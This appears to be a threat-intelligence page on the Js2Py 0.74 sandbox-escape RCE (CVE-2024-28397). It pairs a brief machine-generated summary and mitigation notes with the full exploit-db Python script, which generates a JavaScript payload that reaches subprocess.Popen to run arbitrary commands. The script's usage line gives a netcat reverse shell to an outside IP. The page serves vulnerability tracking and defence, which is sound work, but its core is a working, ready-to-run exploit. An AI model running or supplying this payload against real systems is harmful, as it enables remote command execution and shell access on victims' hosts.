Js2Py 0.74 - RCE
Js2Py 0.74 - RCE
AI Analysis
Technical Summary
Js2Py 0.74 is vulnerable to remote code execution, enabling attackers to run arbitrary code remotely. The exploit code is publicly available in Python, increasing the risk of exploitation. No affected versions are specifically listed beyond 0.74, and no vendor advisory or patch information is currently available. This vulnerability is classified as critical given the nature of RCE flaws.
Potential Impact
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system, potentially leading to full system compromise. No evidence of active exploitation in the wild has been reported to date.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict usage of Js2Py 0.74 in untrusted environments and monitor for updates from the vendor.
Indicators of Compromise
- exploit-code: Exploit Title: Js2Py 0.74 - RCE Date: 2026-02-03 Exploit Author: Ali Sünbül (xeloxa) <alisunbul@proton.me> Author Page: https://github.com/xeloxa Vendor Homepage: https://github.com/PiotrDabkowski/Js2Py Software Link: https://pypi.org/project/Js2Py/ Version: <= 0.74 Tested on: macOS, Linux (Python 3.x) CVE: CVE-2024-28397 Description: This tool generates a malicious JavaScript payload to exploit CVE-2024-28397. The vulnerability in `js2py` allows escaping the sandbox via `Object.getOwnPropertyNames` to access the `subprocess.Popen` class and execute arbitrary commands on the host. This script acts as a payload generator. You must inject the generated output into the vulnerable input field of the target application. Usage: python3 exploit.py -c "id" > payload.js python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444" """ import argparse import sys def generate_payload(command: str) -> str: """ Generates the JavaScript payload to escape the sandbox and execute the command. Args: command (str): The system command to execute. Returns: str: The malicious JavaScript payload. """ # Escape double quotes to prevent syntax errors in the JS string safe_command = command.replace('"', '\\"') # The payload uses a recursive search to find subprocess.Popen starting from a leaked # Python object wrapper. payload = """ var output = "Initial"; try { // 1. Obtain a PyObjectWrapper via Object.getOwnPropertyNames({}) // On Python 3, this returns a wrapped dict_keys object, exposing python internals. var leaked_wrapper = Object.getOwnPropertyNames({}); // 2. Access the python 'object' class via __class__.__base__ var object_class = leaked_wrapper.__getattribute__("__class__").__base__; // 3. Define a recursive function to find subprocess.Popen function find_popen(cls) { var subs = cls.__subclasses__(); for (var i = 0; i < subs.length; i++) { var item = subs[i]; try { if (item.__module__ == "subprocess" && item.__name__ == "Popen") { return item; } } catch (e) { // Ignore access violations during traversal } // Recursively search, avoiding 'type' to prevent infinite recursion if (item.__name__ != "type") { try { var result = find_popen(item); if (result) return result; } catch (e) {} } } return null; } // 4. Find Popen var Popen = find_popen(object_class); if (Popen) { // 5. Execute the command using Popen.communicate() to capture stdout/stderr var res = Popen("COMMAND_PLACEHOLDER", -1, null, -1, -1, -1, null, null, true).communicate(); output = res; } else { output = "Error: Could not find subprocess.Popen"; } } catch (e) { output = "Error during exploit execution: " + e; } output """ return payload.replace("COMMAND_PLACEHOLDER", safe_command) def main() -> None: parser = argparse.ArgumentParser( description="Payload Generator for CVE-2024-28397 (Js2Py Sandbox Escape)", formatter_class=argparse.RawDescriptionHelpFormatter ) parser.add_argument("-c", "--command", help="Command to execute on the target (default: id)", default="id") args = parser.parse_args() # Generate and print only the payload code payload = generate_payload(args.command) print(payload) if __name__ == "__main__": main()
Js2Py 0.74 - RCE
Description
Js2Py 0.74 - RCE
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
Js2Py 0.74 is vulnerable to remote code execution, enabling attackers to run arbitrary code remotely. The exploit code is publicly available in Python, increasing the risk of exploitation. No affected versions are specifically listed beyond 0.74, and no vendor advisory or patch information is currently available. This vulnerability is classified as critical given the nature of RCE flaws.
Potential Impact
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system, potentially leading to full system compromise. No evidence of active exploitation in the wild has been reported to date.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict usage of Js2Py 0.74 in untrusted environments and monitor for updates from the vendor.
Technical Details
- Edb Id
- 52532
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Js2Py 0.74 - RCE
Exploit Title: Js2Py 0.74 - RCE Date: 2026-02-03 Exploit Author: Ali Sünbül (xeloxa) <alisunbul@proton.me> Author Page: https://github.com/xeloxa Vendor Homepage: https://github.com/PiotrDabkowski/Js2Py Software Link: https://pypi.org/project/Js2Py/ Version: <= 0.74 Tested on: macOS, Linux (Python 3.x) CVE: CVE-2024-28397 Description: This tool generates a malicious JavaScript payload to exploit CVE-2024-28397. The vulnerability in `js2py` allows escaping the sandbox via `Object.getOwnProp... (3349 more characters)
Threat ID: 69f311cccbff5d8610aa56dc
Added to database: 4/30/2026, 8:24:44 AM
Last enriched: 4/30/2026, 8:25:00 AM
Last updated: 5/1/2026, 6:43:33 AM
Views: 24
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.